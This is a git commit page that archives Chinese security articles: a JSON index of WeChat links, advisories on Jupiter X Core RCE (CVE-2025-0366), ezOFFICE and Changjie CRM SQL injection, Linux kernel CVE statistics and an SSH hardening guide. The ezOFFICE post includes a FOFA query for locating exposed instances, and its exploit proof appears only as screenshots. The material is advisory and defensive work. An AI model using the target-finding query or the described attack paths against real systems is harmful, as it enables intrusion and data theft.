通过@fastify∕view raw 渲染实现远程代码执行、9万个站点面临风险:Jupiter X Core RCE 漏洞(CVE-2025-0366)、【安全圈】微软Telnet服务器被曝0-Click漏洞:无密码即可控制系统、自动化漏洞检测方案-使用AI调用BurpSuite、漏洞预警|畅捷CRM存在SQL注入漏洞、Linux内核高频攻击面与漏洞类型统计研究、SSH服务已关,为何还被扫描出漏洞?、万户 ezOFFICE selectAmountField.jsp SQL 注入漏洞、苹果“AirBorne”漏洞可能导致零点击 AirPlay RCE 攻击、自动化漏洞检测方案-使用AI调用BurpSuite、龙腾码支付 curl 任意文件读取漏洞、

This commit is contained in:
test 2025-05-06 08:26:25 +00:00
parent a40f8f437f
commit ab03324c10
10 changed files with 1253 additions and 1 deletions

View File

@ -13630,5 +13630,16 @@
"https://mp.weixin.qq.com/s?__biz=MjM5OTk4MDE2MA==&mid=2655277826&idx=1&sn=04f3f2b3f71b2d442a5d63ff0c3e7b09": "IBM X-Force 2025威胁情报指数报告",
"https://mp.weixin.qq.com/s?__biz=MzI5NTM4OTQ5Mg==&mid=2247635713&idx=4&sn=b672bb86a0a8808ab3b047a6b5685a80": "未修复的Windows快捷方式漏洞可导致远程代码执行PoC已公布",
"https://mp.weixin.qq.com/s?__biz=MzkyNzg4NTU0NQ==&mid=2247485482&idx=1&sn=eab009bdddc94441491b0654c51bc264": "域渗透入门-令牌窃取(含复现步骤)",
"https://mp.weixin.qq.com/s?__biz=MzkxNjY5MDc4Ng==&mid=2247485017&idx=1&sn=3fc4ef2fc3f3dcccffdcd5b868fdc4d6": "FastJSON 安全审计简洁实用指南:黑盒免测也能揪出漏洞"
"https://mp.weixin.qq.com/s?__biz=MzkxNjY5MDc4Ng==&mid=2247485017&idx=1&sn=3fc4ef2fc3f3dcccffdcd5b868fdc4d6": "FastJSON 安全审计简洁实用指南:黑盒免测也能揪出漏洞",
"https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247529535&idx=2&sn=e9ab35af50364b690d8f888988ca5908": "通过@fastifyview raw 渲染实现远程代码执行",
"https://mp.weixin.qq.com/s?__biz=Mzg2NTk4MTE1MQ==&mid=2247487424&idx=1&sn=9f2932094a9e1f69c27ea4d0498353d7": "9万个站点面临风险Jupiter X Core RCE 漏洞CVE-2025-0366",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652069446&idx=2&sn=b093a02905ad8999ac398713a11bd267&subscene=0": "【安全圈】微软Telnet服务器被曝0-Click漏洞无密码即可控制系统",
"https://mp.weixin.qq.com/s?__biz=Mzg3OTUxNTU2NQ==&mid=2247490827&idx=4&sn=42e9dc02c4b652d3a4fde7daa3bae244": "自动化漏洞检测方案-使用AI调用BurpSuite",
"https://mp.weixin.qq.com/s?__biz=MzI5NTUzNzY3Ng==&mid=2247489099&idx=1&sn=50e542e6718a6fdc52586b8328e81c94": "漏洞预警|畅捷CRM存在SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MjM5MjEyMTcyMQ==&mid=2651037674&idx=1&sn=3c2070eabf4535bd48c42976876830a5": "Linux内核高频攻击面与漏洞类型统计研究",
"https://mp.weixin.qq.com/s?__biz=MzUyNTExOTY1Nw==&mid=2247530393&idx=1&sn=f3316b2b06f0372fb279fc9d1e5aad9b": "SSH服务已关为何还被扫描出漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247491326&idx=1&sn=1a53b44366e8e8d78ae9fd475c3d7e62": "万户 ezOFFICE selectAmountField.jsp SQL 注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247582234&idx=1&sn=93a0e5ec10f5fee802cea3b4a1279e89": "苹果“AirBorne”漏洞可能导致零点击 AirPlay RCE 攻击",
"https://mp.weixin.qq.com/s?__biz=Mzg5NDU3NDA3OQ==&mid=2247491189&idx=1&sn=8ab999ea264a6356d7f8850f5cb51cf2": "自动化漏洞检测方案-使用AI调用BurpSuite",
"https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247491335&idx=1&sn=41fb84356629ac2796bea7209f48d305": "龙腾码支付 curl 任意文件读取漏洞"
}

View File

@ -0,0 +1,13 @@
# 9万个站点面临风险Jupiter X Core RCE 漏洞CVE-2025-0366
TtTeam 2025-05-06 07:28
拥有超 9 万活跃安装量的热门 WordPress 插件 Jupiter X Core 被发现并修复了编号为 CVE-2025-0366 的安全漏洞。该漏洞被评定为 “SVG 上传到本地文件包含” 类型CVSS 评分高达 8.8可导致经过身份验证的攻击者在存在漏洞的网站上实现远程代码执行RCE。Wordfence 指出,具备贡献者级别及以上访问权限的认证攻击者,能够通过该漏洞在服务器上包含并执行任意文件,进而执行文件内的 PHP 代码。这意味着,即使权限受限的用户也可能借此漏洞控制整个网站,对网站安全构成严重威胁 。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0HlywncJbB3xqbb8uWFlmEe9ziaYYCYPMxOuXTvFiaaXddVQS6icj75RW47jclicsM5IysUIANVHKfpufiaqJDd3nhw/640?wx_fmt=png&from=appmsg "")
该漏洞根源在于 Jupiter X Core 插件的 get_svg () 函数。Wordfence 解析其利用路径:攻击者可创建支持 SVG 上传的表单,上传嵌入恶意内容的 SVG 文件,再将其嵌入帖子,借此实现远程代码执行,使得默认情况下具备贡献者及以上权限的用户可轻易达成攻击目的。
技术分析显示,插件的 Ajax_Handler 类通过 upload_files () 函数处理 SVG 上传,尽管文件名由 uniqid () 函数随机生成,但该函数依赖服务器微秒时间确定随机值,若攻击者掌握上传精确时间,即可推算生成值;加之 get_svg () 方法缺乏有效安全防护,为恶意代码上传与执行敞开大门。
Wordfence 紧急呼吁用户将 Jupiter X Core 更新至 4.8.8 修补版本。尽管因需贡献者级别权限,大规模攻击可能性较低,但成功攻击的后果极为严重。建议使用 Jupiter X 主题的网站所有者务必重视及时更新以抵御潜在威胁。同时Wordfence 再次强调,保持插件和主题版本更新是维护 WordPress 安全的核心举措。

View File

@ -0,0 +1,188 @@
# Linux内核高频攻击面与漏洞类型统计研究
NEURON SAINTSEC 2025-05-06 01:31
```
```
- **CWE统计**
按照CVE公开信息总计314个漏洞按CWE名称可分为31种漏洞类型。统计如下
![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnSB3YbiaYeGicyoD1YCLc7gJW4pIIMesZHW50pMoW4gkL3uySQ4EcOJldzQpbvbSXLIiaibqF5fT9tSibg/640?wx_fmt=png "")
可以从上图看到Use After Free数量非常多数量是第二名Null Pointer Dereference的两倍有余。
另外为了方便统计图的绘制有许多单个的CWE统计在Other类型中总计18个漏洞类型排名不分先后
1. Missing Authorization
2. Use of a Broken or Risky Cryptographic Algorithm
3. Improper Privilege Management
4. Use of Insufficiently Random Values
5. Improper Control of Dynamically-Managed Code Resources
6. Release of Invalid Pointer or Reference
7. Improper Handling of Exceptional Conditions
8. Time-of-check Time-of-use (TOCTOU) Race Condition
9. Insecure Default Initialization of Resource
10. Non-exit on Failed Initialization
11. Unchecked Return Value
12. Deadlock
13. Access of Uninitialized Pointer
14. Loop with Unreachable Exit Condition ('Infinite Loop')
15. Divide By Zero
16. Incorrect Authorization
17. Incorrect Type Conversion or Cast
18. Improper Validation of Array Index
漏洞数量 Top 10 统计如下:
![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnSB3YbiaYeGicyoD1YCLc7gJWd7TvyFhe5Po4cCXXYU0WKhUtFCWOC4WHx5F1r1vSjNJKNhbibQXmAhQ/640?wx_fmt=png "")
Top 10 总计235个漏洞占总漏洞数量的74.84%。Top 10 各类型占比如下:
![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnSB3YbiaYeGicyoD1YCLc7gJWPXx9qyRRpj1HCj7fDXmj0vxLVktAESEFBy7H6NzqkQaNhbVVZzibIkQ/640?wx_fmt=png "")
- **子系统漏洞统计**
分析314个CVE信息排除CVE描述信息不全无f法定位位置的CVE剩余297个漏洞。为了方便统计图的绘制统计了267个漏洞所属子系统
![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnSB3YbiaYeGicyoD1YCLc7gJWE6BB7CqcicGO2AiaD4Uy7tE8hZZIQX6E2HwuJF4ia1Jacl11Ap7Q8MiceA/640?wx_fmt=png "")
另外30个漏洞在单独的子系统或内核模块中排名不分先后
1. HID
2. KPTI
3. SYSCTL Subsystem
4. USB Subsystem
5. Power Supply
6. Driver-Misc
7. Monitor
8. Driver-ATM
9. Driver-Isdn
10. Mgmt-Tester
11. Virtual Devices
12. Driver-Firmware
13. MMU and TLB
14. Events Subsystem
15. Driver-lightnvm
16. Scheduler
17. IPC
18. Driver-VFIO MEDIATED
19. Memory deduplication mechanism
20. X86 ARCHITECTURE
21. Driver-Virt
22. LINUX FOR POWERPC
23. Driver-Vhost
24. DMA
25. Block Subsystem
26. Driver-Bluetooth
27. Workqueue
28. BPF JIT for S390
29. Networking-Bluetooth
30. Driver-SONY MEMORYSTICK
内核子系统漏洞数量 Top 10 统计如下Driver-Video与Driver-Char并列第十
![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnSB3YbiaYeGicyoD1YCLc7gJW2B5yiaD943yLgzJLVWvKdSOG7W7bQ2DuTJ9dXFr0bmy7NcWRauszVjg/640?wx_fmt=png "")
上图可知 NetWorking 和 Filesystem Subsystem 存在大量漏洞,攻击面较大。其余漏洞占比如下,多数也是属于内核驱动程序:
![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnSB3YbiaYeGicyoD1YCLc7gJWfsXz4wJGWTUrnLtylxA8shnInicAIjHckM0WHGLqicfj14ot7gV37pUg/640?wx_fmt=png "")
- **典型攻击面案例**
在分析CVE信息过程中总结了一些比较有代表性的漏洞以及攻击面大多数漏洞可以很容易发现和利用。如下列表
结构体成员未初始化值导致后续操作产生漏洞。例如CVE-2022-29968、CVE-2022-0847
缺少宏定义或缺少权限标志导致内存权限错误或信息泄露。例如CVE-2022-1353、CVE-2022-0500、CVE-2022-0494
调用卸载类的函数后再次使用释放类的函数导致重复释放。例如CVE-2022-29156、CVE-2022-28390
未判断返回指针是否为空或返回值是否失败。例如CVE-2022-28356
无符号和有符号的类型混淆导致的整数溢出。例如CVE-2022-0998
有效生命周期后缺少释放。例如CVE-2022-27950
未加锁导致的条件竞争。例如CVE-2021-4149
写入超出分配的缓冲区大小导致堆溢出。例如CVE-2022-27666
未验证的数组索引。例如CVE-2022-27223
使用结构体前缺少对结构体的验证。例如CVE-2022-0516
缺少对数值的验证未验证是否为0。例如CVE-2021-3743
使用后未对内存清零导致内核信息泄露。例如CVE-2022-0382
释放顺序不正确导致的Use After Free例如CVE-2022-0487
前序函数可返回空值但后序函数未检查返回值是否为空导致空指针引用。例如CVE-2022-0286
- **总结**
通过以上分析,可得知内核的攻击面:
主要的漏洞类型为UAF、空指针引用、OOB Write、OOB Read、条件竞争、有效生命周期后缺少释放。
漏洞产出较多的子系统为网络子系统、文件子系统、BPF、KVM、以及各种内核驱动程序。
整体看来Linux内核对于安全性非常重视虽然某些漏洞无法被用于提权攻击但能达到拒绝服务也被分配了CVE编号。但由于项目庞大、开发者水平参差产生了许多低级的安全性漏洞因此可以从这些方面入手对Linux内核进行漏洞挖掘。
       

View File

@ -0,0 +1,346 @@
# SSH服务已关为何还被扫描出漏洞
原创 圈圈 网络技术干货圈 2025-05-06 03:17
点击上方
 
网络技术干货圈
选择
 
设为星标
优质文章,及时送达
![](https://mmbiz.qpic.cn/mmbiz_png/p8No8ScJKT9z1qCg1V9MbsCSdmUBkOicVRmk5T6j0m8Z8L9YdmdU0crxLkBG4994IkXaZTrSnJAZksCicKaqO43g/640?wx_fmt=png "")
> 转载请注明以下内容:
> **来源**
:公众号【网络技术干货圈】
> **作者**
:圈圈
> **ID**
wljsghq
SSH是一种用于远程登录和安全数据传输的加密协议通常运行在22号端口。由于其重要性SSH服务往往成为攻击者扫描和利用的首要目标。常见的高危漏洞包括弱口令、过旧的SSH版本如OpenSSH早期版本或配置不当导致的权限提升风险。
一般来说当管理员发现SSH服务存在潜在风险时第一反应是通过防火墙屏蔽22端口甚至直接停止SSH服务。然而令人费解的是即便采取了这些措施某些安全扫描工具如Nessus、OpenVAS依然会在报告中指出“SSH高危漏洞”。这不仅让人质疑防火墙的有效性还可能引发对整个网络安全策略的担忧。
![](https://mmbiz.qpic.cn/mmbiz_jpg/p8No8ScJKTibtNUoc3TOhJic0myDwjSkgS66zibbnhBzMnmqIxLG6w0lA2okhZBWVfXlzKNxicsv0R88G2iaEgIiadHA/640?wx_fmt=jpeg&from=appmsg "")
那么,问题出在哪里?是扫描工具误报,还是系统存在未被发现的漏洞?
1.为什么防火墙关闭SSH仍被扫描出漏洞
要理解这一现象,我们需要从以下几个方面分析:
**1. 防火墙配置是否真正生效?**
防火墙是阻止外部访问SSH服务的第一道防线但配置不当可能导致规则未生效。以下是常见问题
- **规则优先级错误**
防火墙规则通常按顺序执行。如果允许22端口的规则排在拒绝规则之前外部扫描仍可能触达SSH服务。
- **未覆盖所有接口**
某些防火墙默认只对特定网络接口生效。如果SSH服务绑定到未受保护的接口漏洞扫描依然能检测到。
- **临时规则未持久化**
使用iptables
或firewalld
配置规则时若未保存重启后规则可能失效导致SSH端口暴露。
**验证方法**
运行以下命令检查防火墙状态:
```
# 检查iptables规则sudo iptables -L-v-n --line-numbers# 检查firewalld规则sudo firewall-cmd --list-all
```
![](https://mmbiz.qpic.cn/mmbiz_png/p8No8ScJKTibtNUoc3TOhJic0myDwjSkgSV9hK8WbSw47AqUOHzmVCJ6V53oX9FforxpVZj8nVbNxlcPzOVD0YKg/640?wx_fmt=png&from=appmsg "")
确保22端口被明确拒绝DROP或REJECT且规则覆盖所有网络接口。此外使用nmap
从外部扫描目标主机确认22端口是否显示为“closed”或“filtered”。
**2. SSH服务是否真正关闭**
即使防火墙屏蔽了22端口如果SSH服务仍在运行扫描工具可能通过其他途径检测到其存在。例如
- **非标准端口运行**
SSH服务可能被配置为监听非22端口如2222。扫描工具通常会扫描全端口发现这些非标准端口的SSH服务。
- **多个SSH实例**
系统可能运行多个SSH服务实例其中一个未被关闭或配置为监听其他端口。
- **容器或虚拟机中的SSH**
如果主机运行Docker容器或虚拟机且这些环境中启用了SSH服务扫描工具可能检测到这些实例。
**验证方法**
检查SSH服务状态
```
# 查看SSH服务是否运行sudo systemctl status sshd# 检查监听端口sudonetstat-tuln|grepsshsudo ss -tuln|grep :22
```
如果发现SSH监听非22端口检查/etc/ssh/sshd_config
中的Port
配置项并确保所有SSH实例已停止
```
sudo systemctl stop sshdsudo systemctl disable sshd
```
![](https://mmbiz.qpic.cn/mmbiz_png/p8No8ScJKTibtNUoc3TOhJic0myDwjSkgSEibBWB3U2nmttBPFuIhlxWibw4uklWicE9NcFUeEbeBSFxHYftJ1RmmmQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/p8No8ScJKTibtNUoc3TOhJic0myDwjSkgS0NP8dDZG5EnnricM2um3u3ke2q0oYc2LXxG1WsVKTGMdbjMo0ibzUqVA/640?wx_fmt=png&from=appmsg "")
**3. 扫描工具的误报或缓存问题**
安全扫描工具并非万无一失,误报或缓存问题可能导致错误结果:
- **历史数据未更新**
某些扫描工具会缓存之前的扫描结果。如果SSH服务在之前的扫描中存在漏洞关闭后未重新扫描可能导致旧报告被重复引用。
- **指纹识别错误**
扫描工具通过服务指纹banner判断服务类型。如果某个非SSH服务如VPN或自定义应用运行在22端口工具可能误将其识别为SSH。
- **扫描范围过广**
如果扫描工具针对整个网段而非单一主机可能错误地将其他主机的SSH漏洞归因于目标主机。
**验证方法**
- 运行手动扫描,指定目标主机和端口:```
nmap -sV-p22<目标IP>
```
- 检查扫描工具日志,确认报告是否基于最新数据。
- 如果怀疑误报尝试更换扫描工具如从Nessus切换到OpenVAS进行交叉验证。
**4. 系统遗留配置或漏洞**
即使SSH服务已关闭系统可能存在遗留文件或配置导致扫描工具报出漏洞
- **旧版本SSH软件包**
未卸载的OpenSSH软件包可能被扫描工具检测为潜在风险即使服务未运行。
- **配置文件漏洞**
/etc/ssh/sshd_config
中可能存在不安全的配置如允许root登录或弱加密算法被扫描工具识别为漏洞。
- **相关服务暴露**
某些与SSH相关的服务如SFTP或rsync可能共享SSH协议栈导致漏洞被误报。
**验证方法**
- 检查已安装的SSH软件包
```
dpkg -l|grep opensshrpm-qa|grep openssh
```
![](https://mmbiz.qpic.cn/mmbiz_png/p8No8ScJKTibtNUoc3TOhJic0myDwjSkgSZicmUK1ebW85cHCww37atSz0w1Gk8lBS2DdXoF8Gl8P501XnXl2Z8iaw/640?wx_fmt=png&from=appmsg "")
- 卸载不必要的SSH软件包
```
sudoapt remove openssh-serversudo yum remove openssh-server
```
- 审计SSH配置文件确保无不安全设置
```
grep-E"PermitRootLogin|PasswordAuthentication|Ciphers|MACs" /etc/ssh/sshd_config
```
**5. 外部代理或NAT的影响**
在复杂网络环境中外部代理、负载均衡器或NAT设备可能导致SSH端口暴露
- **端口转发**
如果路由器或NAT设备配置了端口转发规则外部扫描可能直接触达内部主机的SSH服务。
- **代理服务器暴露**
反向代理如Nginx可能将SSH流量转发到后端主机导致扫描工具检测到漏洞。
- **云服务配置**
在云环境中如AWS、阿里云安全组或网络ACL可能未正确配置导致22端口暴露。
**验证方法**
- 检查云服务安全组规则确保22端口仅允许受信任IP访问。
- 在外部网络运行telnet <目标IP> 22
,确认是否能建立连接。
- 检查路由器或代理配置,禁用不必要的端口转发。
2.如何彻底解决SSH漏洞问题
针对以上分析,我们总结出一套系统化的解决方案,涵盖预防、检测和修复三个层面。
**1. 确保SSH服务安全关闭**
- **停止并禁用SSH服务**
```
sudo systemctl stop sshdsudo systemctl disable sshd
```
- **卸载不必要的SSH软件包**
```
sudoapt purge openssh-serversudo yum remove openssh-server
```
- **验证服务状态**
使用netstat
或ss
确认22端口未被监听。
**2. 强化防火墙配置**
- **添加拒绝规则**
使用iptables
或firewalld
屏蔽22端口
```
# iptablessudo iptables -A INPUT -p tcp --dport22-j DROPsudo iptables-save > /etc/iptables/rules.v4# firewalldsudo firewall-cmd --permanent --add-port=22/tcp --zone=dropsudo firewall-cmd --reload
```
- **检查规则生效**
使用nmap
从外部扫描确认22端口状态为“filtered”。
**3. 优化SSH配置若需保留SSH**
如果业务需要保留SSH服务需采取以下加固措施
- **更改默认端口**
编辑/etc/ssh/sshd_config
将Port 22
改为非标准端口如2222
```
Port 2222
```
重启服务:
```
sudo systemctl restart sshd
```
- **禁用root登录**
设置PermitRootLogin no
- **使用强认证**
启用公钥认证,禁用密码认证:
```
PasswordAuthentication no
```
- **限制访问IP**
在防火墙或SSH配置中限制允许连接的IP
```
# /etc/hosts.allowsshd: 192.168.1.0/24
```
- **更新SSH版本**
确保使用最新版本的OpenSSH避免已知漏洞
```
sudoapt upgrade openssh-serversudo yum update openssh-server
```
**4. 定期扫描与监控**
- **部署入侵检测系统IDS**
使用Fail2Ban或OSSEC监控SSH登录尝试自动封禁异常IP。
- **定期漏洞扫描**
使用Nessus、OpenVAS等工具定期扫描系统及时发现潜在风险。
- **日志审计**
检查SSH日志/var/log/auth.log
或/var/log/secure
),分析是否有未授权访问。
**5. 处理误报与外部设备**
- **清除扫描缓存**
:在扫描工具中强制刷新结果,避免历史数据干扰。
- **检查外部设备**
:审计路由器、代理和云服务配置,确保无意外端口暴露。
- **交叉验证**
使用多种扫描工具如Nmap、Metasploit验证漏洞真实性。
3.一个真实的排查过程
某企业管理员小李发现Nessus扫描报告中反复提示服务器存在“OpenSSH弱口令漏洞”但他已通过iptables
屏蔽了22端口且systemctl
确认SSHD服务已停止。
小李尝试以下步骤解决问题:
1. **检查防火墙**
运行iptables -L
发现规则未持久化重启后失效。执行iptables-save
修复。
1. **扫描非标准端口**
使用nmap -p 1-65535
发现2222端口运行SSH服务。检查/etc/ssh/sshd_config
确认有人将SSH改为2222端口。
1. **卸载SSH**
因业务无需SSH小李直接卸载OpenSSH软件包。
1. **重新扫描**
清除Nessus缓存重新扫描漏洞消失。
通过这一过程,小李不仅解决了漏洞问题,还优化了服务器安全配置。
防火墙关闭SSH服务后仍被扫描出高危漏洞通常源于配置不当、服务未完全关闭、扫描误报或外部设备影响。解决这一问题需要从防火墙、SSH服务、扫描工具和网络环境四个方面入手逐一排查并加固。
**建议**
- 定期审查系统服务和端口状态,避免遗留风险。
- 建立完善的网络安全策略包括防火墙、IDS和日志监控。
- 保持软件更新,及时修补已知漏洞。
- 培养安全意识,定期培训管理员,防止人为配置失误。
网络安全无小事SSH漏洞虽小却可能成为攻击者的突破口。通过本文的深度分析与解决方案相信你能从容应对这一问题守护系统的每一道防线。
# ---END---重磅!网络技术干货圈-技术交流群已成立扫码可添加小编微信,申请进群。一定要备注:工种+地点+学校/公司+昵称(如网络工程师+南京+苏宁+猪八戒),根据格式备注,可更快被通过且邀请进群▲长按加群
![](https://mmbiz.qpic.cn/mmbiz_gif/p8No8ScJKT91zHQia5QWRMJhVxUyF4g3ZAuv0YbUEoiaVCzgE2gQT6eQC0Hx6icUE9HQbqFfVP3sSqbIUksF1Ojrg/640?wx_fmt=gif "")

View File

@ -0,0 +1,117 @@
# 万户 ezOFFICE selectAmountField.jsp SQL 注入漏洞
Superhero Nday Poc 2025-05-06 06:26
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkYN4sZibCVo6EFo0N9b7Kib4I4N6j6Y10tynLOdgov9ibUmaNwW5yeoCbQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkhic5lbbPcpxTLtLccZ04WhwDotW7g2b3zBgZeS5uvFH4dxf0tj0Rutw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCk524CiapZejYicic1Hf8LPt8qR893A3IP38J3NMmskDZjyqNkShewpibEfA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的
POC
信息及
POC对应脚本
而造成的任何直接或者间接的后果及损失均由使用者本人负责公众号Nday Poc及作者不为此承担任何责任一旦造成后果请自行承担
**01**
**漏洞概述**
万户 ezOFFICE selectAmountField.jsp 存在SQL注入漏洞攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码,站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
**02******
**搜索引擎**
FOFA:
```
title="万户ezOFFICE协同管理平台" || title="ezOFFICE协同管理平台" || title="Wanhu ezOFFICE" || title="ezOffice for iPhone" || body="EZOFFICEUSERNAME" || body="whirRootPath" || body="/defaultroot/js/cookie.js" || header="LocLan" || (banner="/defaultroot/sp/login.jsp" && banner="Set-Cookie: JSESSIONID=") || (header="Set-Cookie: OASESSIONID=" && (title="ezOFFICE" || body="whir.util.js" || body="var ezofficeUserPortal_ = Cookie(\"ezofficeUserPortal\");"))
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tuQTG2u3Ea5ZaB9NRcnQRPMha52NIh4PiaMdHTMS6gxPicsIsVic9ia3gbRw/640?wx_fmt=png&from=appmsg "")
**03******
**漏洞复现**
延时4秒
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tuicyOKl2ZMxXab30W5kavCJymmnfgEhCxw7yYAibA22ao5Ubjlf1xXdkA/640?wx_fmt=png&from=appmsg "")
sqlmap验证
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tuHfyhYkY97iamX8M6ibakPgISDgzLpsQNp6WRw9RhcBAvob2ia66TtofYg/640?wx_fmt=png&from=appmsg "")
**04**
**自查工具**
nuclei
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tu8nw5ibyNjbeBwY59SZ9dSB0Zxhibia4OvsEdZicnMM8V95y3TuUSkMQkCw/640?wx_fmt=png&from=appmsg "")
afrog
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tu09gK65KtRhKKxpdEZe1ib77mc41a6RJQHloj5ppfOWxCPtUSuY6ia9rg/640?wx_fmt=png&from=appmsg "")
xray
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tuetoHTfbNWNJ0qNw7zky1UsaFDfF4Dr5IoLm7pLkjSGBiadT2baEiamDQ/640?wx_fmt=png&from=appmsg "")
**05******
**修复建议**
1、关闭互联网暴露面或接口设置访问权限
2、
升级至安全版本
**06******
**内部圈子介绍**
【Nday漏洞实战圈】🛠 
专注公开1day/Nday漏洞复现
 · 工具链适配支持
 ✧━━━━━━━━━━━━━━━━✧ 
🔍 资源内容
 ▫️ 整合全网公开
1day/Nday
漏洞POC详情
 ▫️ 适配Xray/Afrog/Nuclei检测脚本
 ▫️ 支持内置与自定义POC目录混合扫描 
🔄 更新计划 
▫️ 每周新增7-10个实用POC来源公开平台 
▫️ 所有脚本经过基础测试,降低调试成本 
🎯 适用场景 
▫️ 企业漏洞自查 ▫️ 渗透测试 ▫️ 红蓝对抗 
▫️ 安全运维
✧━━━━━━━━━━━━━━━━✧ 
⚠️ 声明:仅限合法授权测试,严禁违规使用!
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwI0beBCCyKGykkAazuPyvibgC0ooBGy9elQQ72f1WIB73UDYuPhx8cnCobvnOBdTcxmdwBbt2eAYIQ/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,93 @@
# 漏洞预警|畅捷CRM存在SQL注入漏洞
SecHub网络安全社区 2025-05-06 06:57
****
****
****
**点击蓝字 关注我们**
![](https://mmbiz.qpic.cn/mmbiz_png/8icWLyUKibZZrPdaxnm18Zscp6Xcu0OiaMwuh8LP87lPQLxMwiceAsv3TurmE7zZOulOhMELnQ2OulwFIJkbmB3bRg/640?wx_fmt=png "")
**免责声明**
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
## 🌟简介
##     畅捷 CRM 是一款先进的客户关系管理工具,适用于各种规模的企业,能全面提升企业的客户管理水平和运营效率
![](https://mmbiz.qpic.cn/mmbiz_png/8icWLyUKibZZoUyBrQNE6PHSDmBYJY5uDld2wIn7zalnGxyqYqyj12WO2cp2BD24p4nDp8twsWZXibplVuScuibIicQ/640?wx_fmt=png&from=appmsg "")
## 漏洞信息
    
畅捷通存在
CNNVD-2025-45290466 SQL注入攻击者可以利用此漏洞获取系统敏感数据。
**受影响的版本**
畅捷CRM
**修补措施**
输入验证和过滤
白名单验证:为输入字段明确规定允许的字符和格式,仅接受符合白名单规则的输入。比如,若某字段仅允许输入数字,就可以使用正则表达式进行验证。
过滤特殊字符:对用户输入进行过滤,去除或转义可能用于 SQL 注入的特殊字符,如单引号、分号等。不过要注意,单纯的字符过滤可能存在绕过风险,因此最好结合其他方法使用。
欢迎关注SecHub网络安全社区SecHub网络安全社区目前邀请式注册邀请码获取见公众号菜单【邀请码】
**#**
**企业简介**
**赛克艾威 - 网络安全解决方案提供商**
****
       北京赛克艾威科技有限公司简称赛克艾威成立于2016年9月提供全面的安全解决方案和专业的技术服务帮助客户保护数字资产和网络环境的安全。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
![](https://mmbiz.qpic.cn/mmbiz_png/8icWLyUKibZZrPdaxnm18Zscp6Xcu0OiaMwuh8LP87lPQLxMwiceAsv3TurmE7zZOulOhMELnQ2OulwFIJkbmB3bRg/640?wx_fmt=png "")
**联系方式**
电话010-86460828 
官网https://sechub.com.cn
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/MVPvEL7Qg0FW5uwU0BZtn2lmMrLPwpibCeCVbtBFDRkbFb7n7ibhPRxg20spUo9mUIiakmRYABB88Idl81IpGuXfw/640?wx_fmt=gif "")
**关注我们**
![](https://mmbiz.qpic.cn/mmbiz_png/SUZ43ICubr4mWJcUARDKYbQooQjbjbmqZTerAIXqDX9CaVxXbB7pyWwnMRklrCJias9r59PhnJAxZ4e3gYjyqVQ/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/mmbiz_png/SUZ43ICubr4mWJcUARDKYbQooQjbjbmqZTerAIXqDX9CaVxXbB7pyWwnMRklrCJias9r59PhnJAxZ4e3gYjyqVQ/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/8icWLyUKibZZrPdaxnm18Zscp6Xcu0OiaMwyhlWCYDVqK38BA5dbjKkH7icWmAew7SYRA7ao1bFibialrMvmQ9ib0TBvw/640?wx_fmt=jpeg "")
**公众号:**
sechub安全
**哔哩号:**
SecHub官方账号

View File

@ -0,0 +1,197 @@
# 自动化漏洞检测方案-使用AI调用BurpSuite
